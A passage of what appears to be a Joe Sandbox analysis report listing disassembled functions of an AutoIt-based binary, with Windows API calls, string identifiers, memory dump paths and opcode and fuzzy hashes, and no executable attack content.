                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __snwprintf_memmove
                                                                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                        • API String ID: 3506404897-2584243854
                                                                                                                                        • Opcode ID: b5bef96d8081c036162c111bf645f96b1c86422ad677f1956019dc16a14b3dd5
                                                                                                                                        • Instruction ID: 774f157f3bede05edcc3130f2f4b448beb52c3218e10ceaac372beea272d84fc
                                                                                                                                        • Opcode Fuzzy Hash: b5bef96d8081c036162c111bf645f96b1c86422ad677f1956019dc16a14b3dd5
                                                                                                                                        • Instruction Fuzzy Hash: 6B218270A0021EAFDF10EFA4D899EAE7FA5BF95740F400458FD05A7281DB30A985CBA5
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00596D86
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00596D91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: Combobox
                                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                                        • Opcode ID: e983c99654798a1fe165ac311af75721e93d6c06566ced096419577bc851fa9d
                                                                                                                                        • Instruction ID: c78642ff7118f4faebaf4c0de943895e681cf3797cea03bfea3980eca1424e0b
                                                                                                                                        • Opcode Fuzzy Hash: e983c99654798a1fe165ac311af75721e93d6c06566ced096419577bc851fa9d
                                                                                                                                        • Instruction Fuzzy Hash: 3911BF71310209BFEF218E54DC81EFB3FAAFB883A4F104129F9289B290D6319C5487A0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                                                                                                                                          • Part of subcall function 00512111: GetStockObject.GDI32(00000011), ref: 00512163
                                                                                                                                          • Part of subcall function 00512111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00597296
                                                                                                                                        • GetSysColor.USER32(00000012), ref: 005972B0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                        • String ID: static
                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                        • Opcode ID: 65221c26841828b7289eba3b573d881fe0eee28aa51a20f5a96ef4a1046ec97d
                                                                                                                                        • Instruction ID: 5bf36cbeddd01ca4835d5b71f04c6032125e32fc352a75812781da67fd3a0faa
                                                                                                                                        • Opcode Fuzzy Hash: 65221c26841828b7289eba3b573d881fe0eee28aa51a20f5a96ef4a1046ec97d
                                                                                                                                        • Instruction Fuzzy Hash: FA21477262420AAFDF04DFB8CC45AFA7BA8FB08304F004519FD55D3240E734A850DB50
                                                                                                                                        APIs
                                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00596FC7
                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00596FD6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                                        • String ID: edit
                                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                                        • Opcode ID: d9de9b5fbd4aa7bc379721b355fa20268967f98fde272a874d209020bda563fd
                                                                                                                                        • Instruction ID: 52f052a8ede24182b5b754325078b2fff756ec7349eed038184bbd9813aae8ee
                                                                                                                                        • Opcode Fuzzy Hash: d9de9b5fbd4aa7bc379721b355fa20268967f98fde272a874d209020bda563fd
                                                                                                                                        • Instruction Fuzzy Hash: 31116671510209ABEF108E64AC84EFB3FAAFB15368F105714F964931E4C735DC98AB60
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 005731C9
                                                                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 005731E8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                        • Opcode ID: e2b7dcf3483061f125628e30f1bade5436ac2459cf07b2666f3a409fbe11e98f
                                                                                                                                        • Instruction ID: e2ff7fca19b98539e35d3cd005e2a911fc09381b56794aad36697995c358bcb2
                                                                                                                                        • Opcode Fuzzy Hash: e2b7dcf3483061f125628e30f1bade5436ac2459cf07b2666f3a409fbe11e98f
                                                                                                                                        • Instruction Fuzzy Hash: B4113B7590221AEBDB20DB98EC05B9D7FB8BB05320F448122E80DA7290D730EF05FB90
                                                                                                                                        APIs
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0051351D
                                                                                                                                        • DestroyWindow.USER32(?,?,00524E61), ref: 00513576
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteDestroyObjectWindow
                                                                                                                                        • String ID: hZ
                                                                                                                                        • API String ID: 2587070983-3824762921
                                                                                                                                        • Opcode ID: 4ef1ec285180a250ec6b43c6eb8c4e0beb604ce8557768153c4eec3a776a22c6
                                                                                                                                        • Instruction ID: 97c3a81749b54cf9ba7c78f48f1aaad508b2ed3a490ae5fe738ccf7d04b5e65f
                                                                                                                                        • Opcode Fuzzy Hash: 4ef1ec285180a250ec6b43c6eb8c4e0beb604ce8557768153c4eec3a776a22c6
                                                                                                                                        • Instruction Fuzzy Hash: A721337060A115CFEB34DB18D868A653BE2FB58714B05455BE406972A4E730DE88FB51
                                                                                                                                        APIs
                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 005828F8
                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00582921
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                        • String ID: <local>
                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                        • Opcode ID: c0c87c25dde9849725473dc06f64673b7b02d4d34c7c576744babcbc54661931
                                                                                                                                        • Instruction ID: 6ae3d2067412b8f2339fc396dbcd4d6f236fe070af499e046b73022c32a087f0
                                                                                                                                        • Opcode Fuzzy Hash: c0c87c25dde9849725473dc06f64673b7b02d4d34c7c576744babcbc54661931
                                                                                                                                        • Instruction Fuzzy Hash: 7B11E070501325BAEB249F518C89EBBFFACFF16351F10852AF95562040E3706894EBE0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscmp
                                                                                                                                        • String ID: 0.0.0.0$L,Z
                                                                                                                                        • API String ID: 856254489-1023806
                                                                                                                                        • Opcode ID: 389d1da3fd65df583f247c9436a0266841ff9564176a79f7ff7ed57753cf48ed
                                                                                                                                        • Instruction ID: c4cd48d4801dc618b0671e1199013954a66c0f5246a0700309a107c686327832
                                                                                                                                        • Opcode Fuzzy Hash: 389d1da3fd65df583f247c9436a0266841ff9564176a79f7ff7ed57753cf48ed
                                                                                                                                        • Instruction Fuzzy Hash: AE11B2356002059FDB04EE14D985EADBFB8BF85720F50C449FA095B3A1DA30ED82DB60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005886E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0058849D,?,00000000,?,?), ref: 005886F7
                                                                                                                                        • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005884A0
                                                                                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 005884DD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                        • API String ID: 2496851823-2422070025
                                                                                                                                        • Opcode ID: 033e7a0b587526488aa8d90f4d23e882e87b5188e9ae2fccf7057bfed3bd13d4
                                                                                                                                        • Instruction ID: aaaba900be6e4105d9d8c71051f347f00cd517c8958f63a74f1b7646ab6d0dd4
                                                                                                                                        • Opcode Fuzzy Hash: 033e7a0b587526488aa8d90f4d23e882e87b5188e9ae2fccf7057bfed3bd13d4
                                                                                                                                        • Instruction Fuzzy Hash: 3B11C23510021AABDF10AF64D846FBEBB64FF55324F10451AED11672D1DB31A804CB95
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0056B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0056B7BD
                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00569A2B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 372448540-1403004172
                                                                                                                                        • Opcode ID: 7e7fa999915de4a85f9a6a1e3a2be651f3c3883ec59b2115dec9b9f843f27d33
                                                                                                                                        • Instruction ID: 5e2380cd2e07f66f35c37a650f26c1c6bd555c361c245d032eb533418f143c68
                                                                                                                                        • Opcode Fuzzy Hash: 7e7fa999915de4a85f9a6a1e3a2be651f3c3883ec59b2115dec9b9f843f27d33
                                                                                                                                        • Instruction Fuzzy Hash: 6401F571A41129AB8B14FBA4CC55DFE7FADFFA2320B000619F861932C1DB305D089690
                                                                                                                                        APIs
                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0051BC07
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        • _wcscat.LIBCMT ref: 00553593
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FullNamePath_memmove_wcscat
                                                                                                                                        • String ID: s]
                                                                                                                                        • API String ID: 257928180-4126774240
                                                                                                                                        • Opcode ID: a0344d8a70e7d796f98ca3a546a977f2e0325693a20b5455f04948ba73999270
                                                                                                                                        • Instruction ID: 0d08ee836906c27f240a8b1865cee4c87b8e13009728cb0806dfdc07abaf1fd2
                                                                                                                                        • Opcode Fuzzy Hash: a0344d8a70e7d796f98ca3a546a977f2e0325693a20b5455f04948ba73999270
                                                                                                                                        • Instruction Fuzzy Hash: 7011A53090421A97DB11EBA4984AEDE7FE8FF49350F1004A6B945D7290EF709BC49B91
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fread_nolock_memmove
                                                                                                                                        • String ID: EA06
                                                                                                                                        • API String ID: 1988441806-3962188686
                                                                                                                                        • Opcode ID: 65a3c646f2df640a9d8039a3bf17d9fe5966964b837d7609bb8d06c67001ed5f
                                                                                                                                        • Instruction ID: dcefc3cb201a3436d0737c69294bc33808d485068807ad25ba1c9fc8daf53fd7
                                                                                                                                        • Opcode Fuzzy Hash: 65a3c646f2df640a9d8039a3bf17d9fe5966964b837d7609bb8d06c67001ed5f
                                                                                                                                        • Instruction Fuzzy Hash: 3E01F9728042587EDB18C6A8C85AEFEBFF8AB01301F00459EF552D2181E5B5E6048760
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0056B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0056B7BD
                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00569923
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 372448540-1403004172
                                                                                                                                        • Opcode ID: ee5a36db690c1eee23e348e358d1b9b906d82bf5e7dbd132b48b3f49f8a417d1
                                                                                                                                        • Instruction ID: 6dffae7d538d3af9f975d482cccd58ed4028ad8d6a5ff195db3824106367d5c6
                                                                                                                                        • Opcode Fuzzy Hash: ee5a36db690c1eee23e348e358d1b9b906d82bf5e7dbd132b48b3f49f8a417d1
                                                                                                                                        • Instruction Fuzzy Hash: 4A018475A411196BCB14FBA4D956EFF7FACBFA6340F140119B841A32C1DA205E0896F1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0056B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0056B7BD
                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 005699A6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 372448540-1403004172
                                                                                                                                        • Opcode ID: 6a51eb7ee10da88cd3df4bc887df973d4a44747596c631385e932ddf83d28325
                                                                                                                                        • Instruction ID: 24836071dcb20ade59d923001946690cb61510b69b6f43964670a2b0c6ac4422
                                                                                                                                        • Opcode Fuzzy Hash: 6a51eb7ee10da88cd3df4bc887df973d4a44747596c631385e932ddf83d28325
                                                                                                                                        • Instruction Fuzzy Hash: D701A776A411196BCB14FBA4CA56EFF7FACBF62340F140019B845B32C1DA244F0896B1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __calloc_crt
                                                                                                                                        • String ID: @b]
                                                                                                                                        • API String ID: 3494438863-3452596414
                                                                                                                                        • Opcode ID: 5cf05835313de6e3632326157b5fee08a7c25cc7bc7b2e3fa6ad736baa9d4918
                                                                                                                                        • Instruction ID: 6626671836a9441c6cfb1e87faba956ae6c916d7506a71ce14774ab60306d0cd
                                                                                                                                        • Opcode Fuzzy Hash: 5cf05835313de6e3632326157b5fee08a7c25cc7bc7b2e3fa6ad736baa9d4918
                                                                                                                                        • Instruction Fuzzy Hash: E1F04FB530A356ABE7388B69FC057A52F95F768724F50986BF100CB294F73088855694
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassName_wcscmp
                                                                                                                                        • String ID: #32770
                                                                                                                                        • API String ID: 2292705959-463685578
                                                                                                                                        • Opcode ID: f9d7c363d0c0b964c20d52f37688dd7be1001f8aac17f80af273451989ff3639
                                                                                                                                        • Instruction ID: 21df6165ede52b7de012c0d9cb1a662cee9acbce7ae42f869a3f513d3f576d1f
                                                                                                                                        • Opcode Fuzzy Hash: f9d7c363d0c0b964c20d52f37688dd7be1001f8aac17f80af273451989ff3639
                                                                                                                                        • Instruction Fuzzy Hash: 4FE0D1765002292BD7209699BC49FABFFACFB55771F000157FD04D7051E570AA4587D0
                                                                                                                                        APIs
                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 005688A0
                                                                                                                                          • Part of subcall function 00533588: _doexit.LIBCMT ref: 00533592
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
